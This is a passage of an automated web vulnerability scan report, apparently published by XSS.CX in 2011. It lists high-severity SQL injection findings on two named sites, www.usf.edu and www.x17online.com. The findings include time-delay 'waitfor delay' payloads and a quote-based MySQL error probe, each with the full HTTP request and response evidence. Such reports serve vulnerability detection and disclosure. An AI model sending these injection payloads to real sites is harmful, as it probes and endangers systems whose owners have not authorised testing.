The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20192 milliseconds to respond to the request, compared with 49 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-info'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:56:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRSTRAB=DNBJAMADIENPAGGEAJEJHAOO; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...
1.18. http://www.usf.edu/server-info [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-info

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 20194 milliseconds to respond to the request, compared with 49 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-info?1'waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:54:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRSTRAB=AJBJAMADIEKOLOGDIBAHAPEE; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...
1.19. http://www.usf.edu/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20233 milliseconds to respond to the request, compared with 50 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-status'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCBACQA=CECKKBBDAIJFLPOLOBMEBOKM; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...
1.20. http://www.usf.edu/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 20180 milliseconds to respond to the request, compared with 50 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /server-status?1'waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usf.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:28:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 6712
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCBACQA=OPBKKBBDICKKJIJNMFJCGNLO; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   <head>
       <meta
...[SNIP]...
1.21. http://www.x17online.com/server-status [REST URL parameter 1]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x17online.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.x17online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:27:10 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1787

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/') or (fileinfo_url like '/server-status'/index%'))
and bl' at line 5</font>
...[SNIP]...

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.x17online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:27:10 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 1444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...
Report generated by XSS.CX at Sat Apr 02 06:09:43 CDT 2011.